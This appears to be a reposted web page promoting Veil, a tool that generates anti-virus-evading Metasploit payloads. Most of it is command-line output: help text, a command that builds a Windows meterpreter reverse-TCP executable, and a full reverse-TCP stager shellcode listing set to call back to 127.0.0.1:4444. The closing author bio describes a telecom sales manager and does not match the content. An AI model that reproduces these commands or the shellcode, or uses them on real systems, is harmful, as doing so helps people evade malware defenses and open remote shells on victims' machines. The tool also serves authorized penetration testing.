Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
Veil is current under support by @ChrisTruncer
Python 3.3 ^(https://www.python.org/downloads/release/python-335/)

  • Py2Exe ^(https://pypi.python.org/pypi/py2exe/)
  • PyCrypto ^(http://www.voidspace.org.uk/python/modules.shtml#pycrypto)
  • PyWin32 ^(https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/)
  • Example Usage
    Veil’s Main Menu:

    $ ./Veil.py
    ===============================================================================
    Veil | [Version]: 3.1.6
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    Main Menu

    2 tools loaded

    Available Tools:

    1) Evasion
    2) Ordnance

    Available Commands:

    exit Completely exit Veil
    info Information on a specific tool
    list List available tools
    options Show Veil configuration
    update Update Veil
    use Use a specific tool

    Veil>:

    Help

    $ ./Veil.py --help
    usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
    [--version] [--ip IP] [--port PORT] [--list-payloads]
    [-p [PAYLOAD]] [-o OUTPUT-NAME]
    [-c [OPTION=value [OPTION=value ...]]]
    [--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
    [--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
    [--list-encoders] [-e ENCODER] [-b x00x0a..] [--print-stats]

    Veil is a framework containing multiple tools.

    [*] Veil Options:
    --list-tools List Veil's tools
    -t TOOL, --tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.)
    --update Update the Veil framework
    --setup Run the Veil framework setup file & regenerate the
    configuration
    --config Regenerate the Veil framework configuration file
    --version Displays version and quits

    [*] Callback Settings:
    --ip IP, --domain IP IP address to connect back to
    --port PORT Port number to connect to

    [*] Payload Settings:
    --list-payloads Lists all available payloads for that tool

    [*] Veil-Evasion Options:
    -p [PAYLOAD] Payload to generate
    -o OUTPUT-NAME Output file base name for source and compiled binaries
    -c [OPTION=value [OPTION=value ...]]
    Custom payload module options
    --msfoptions [OPTION=value [OPTION=value ...]]
    Options for the specified metasploit payload
    --msfvenom [] Metasploit shellcode to generate (e.g.
    windows/meterpreter/reverse_tcp etc.)
    --compiler pyinstaller
    Compiler option for payload (currently only needed for
    Python)
    --clean Clean out payload folders

    [*] Veil-Ordnance Shellcode Options:
    --ordnance-payload PAYLOAD
    Payload type (bind_tcp, rev_tcp, etc.)

    [*] Veil-Ordnance Encoder Options:
    --list-encoders Lists all available encoders
    -e ENCODER, --encoder ENCODER
    Name of shellcode encoder to use
    -b x00x0a.., --bad-chars x00x0a..
    Bad characters to avoid
    --print-stats Print information about the encoded shellcode
    $

    Veil Evasion CLI

    $ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
    ===============================================================================
    Veil-Evasion
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    runtime/internal/sys
    runtime/internal/atomic
    runtime
    errors
    internal/race
    sync/atomic
    math
    sync
    io
    unicode/utf8
    internal/syscall/windows/sysdll
    unicode/utf16
    syscall
    strconv
    reflect
    encoding/binary
    command-line-arguments
    ===============================================================================
    Veil-Evasion
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    [*] Language: go
    [*] Payload Module: go/meterpreter/rev_tcp
    [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
    [*] Source code written to: /var/lib/veil/output/source/payload.go
    [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
    $
    $ file /var/lib/veil/output/compiled/payload.exe
    /var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    $

    Veil Ordnance CLI

    $ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
    ===============================================================================
    Veil-Ordnance
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    [*] Payload Name: Reverse TCP Stager (Stage 1)
    [*] IP Address: 127.0.0.1
    [*] Port: 4444
    [*] Shellcode Size: 287

    xfcxe8x86x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx8bx4cx10x78xe3x4ax01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx89x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x97x6ax09x68x7fx00x00x01x68x02x00x11x5cx89xe6x6ax10x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6x85xf6x75xecxc3
    $

    Download Veil ^(https://github.com/Veil-Framework/Veil)

    Author: Marshmallow

    Marshmallow Android is BT Ireland’s Head of Sales for Republic of Ireland domestic multi-site companies, indigenous MNCs and public sector accounts. He is responsible for the direction and control of all sales activity in the region. He has over 10 years management experience from high growth start-ups to more established businesses. He’s led teams in Ireland, India and China across various industries (ICT, On-Line Recruitment, Corporate Training and International Education).